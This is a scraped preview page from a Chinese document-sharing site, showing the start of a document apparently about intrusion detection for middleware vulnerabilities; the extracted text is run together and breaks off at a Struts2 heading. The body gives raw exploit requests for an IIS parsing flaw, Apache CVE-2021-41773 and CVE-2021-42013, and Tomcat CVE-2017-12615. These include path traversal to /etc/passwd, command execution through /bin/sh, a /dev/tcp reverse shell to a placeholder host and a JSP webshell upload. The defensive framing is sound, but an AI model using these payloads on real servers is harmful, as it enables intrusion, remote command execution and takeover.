- 1、本文档共27页,可阅读全部内容。
- 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
关于漏洞后门防护的
入侵检测配置
1中间件漏洞
IIS解析漏洞IIS6.0版本,会将“1.asp;.ipg”这样的文件当作ASP文件解析。在计算机对文件扩展名的理解上来说,文件扩展名是以最后一个“.”的后面内容为据的,这个文件被网站过滤程序理解成了图片。而实际上,IIS会认为分号即是结尾,后面内容被“截断”了,认为这是ASP文件,于是产生了差异,差异即是不安全。OPTIONS/xHTTP1.1Host:探测是否允许PUT方法上传PUT/x.txtHTTP1.1Host:Content-Length:30%executerequest(“123456”)%#上传的内容上传一个txt文件COPY/x.txtHTTP1.1Host:Destination:/cmd.asp#将x.txt重命名为cmd.asp(由于解析漏洞)通过move或copy重命名文件
Apache解析漏洞因为Apache认为一个文件可以拥有多个扩展名,哪怕没有文件名,也可以拥有多个扩展名。Apache认为应该从右到左开始判断解析方法的。如果最右侧的扩展名为不可识别的,就继续往左判断,直到判断到文件名为止。
Apache漏洞-CVE-2021-41773ApacheHTTPServer2.4.49、2.4.50版本对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。GET/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd文件读取POST/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/shHTTP/1.1Host:7:53238Content-Type:text/plainContent-Length:8echo;idRCE命令执行
Apache漏洞-CVE-2021-42013ApacheHTTPServer2.4.50中针对CVE-2021-41773的修复不够充分。攻击者可以使用路径遍历攻击将URL映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可能会成功。如果还为这些别名路径启用了CGI脚本,则这可能允许远程代码执行。POST/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/shHTTP/1.1Host::29045Cache-Control:max-age=0Upgrade-Insecure-Requests:1User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Connection:closeContent-Type:application/x-www-form-urlencodedecho;echoexec/bin/sh0/dev/tcp/x.x.x.x/88881020/tmp/a.shRCE命令执行
Tomcat解析漏洞-CVE-2017-12615CVE-2017-12615漏洞称之为TomcatPUT方法任意写文件漏洞,类似IIS的PUT上传漏洞。该漏洞可以利用HTTP的PUT方法直接上传webshell到目标服务器,从而获取权限。该漏洞是高危漏洞,在Tomcat的web.xml默认情况下不存在该漏洞,但是一单开发者或者运维人员手动讲web.xml中的readonly设置为false,可以通过PUT/DELETE进行文件操控。PUT/shell.jsp/HTTP/1.1Host:Content-Length:10%Processprocess=Runtime.getRuntime().exec(request.getParameter(cmd));%POC
2框架漏洞
Struts2-S2-01漏洞原理:该漏洞因用户提交表单数据
您可能关注的文档
最近下载
- 2025年上半年教师资格考试高中语文学科知识与教学能力试卷与参考答案.docx VIP
- 平地机零件手册.pdf
- 贵州政立矿业有限公司平安二矿非煤矿山水害专项治理工程实施方案.doc
- 教师资格考试高中语文学科知识与教学能力新考纲必刷题解析(2025年).docx VIP
- 2025年教师资格考试高中学科知识与教学能力语文重点难点题库详解.docx VIP
- 控烟知识培训远离香烟完整版课件.pptx VIP
- 2025年生活会(四个带头)个人对照检查材料【含违纪行为典型案例剖析】2篇文.docx VIP
- 历年医学考研复试真题——麻醉学.pdf
- 基于神经网络手写数字识别系统设计与实现.doc
- 社区概述幻灯片.ppt
文档评论(0)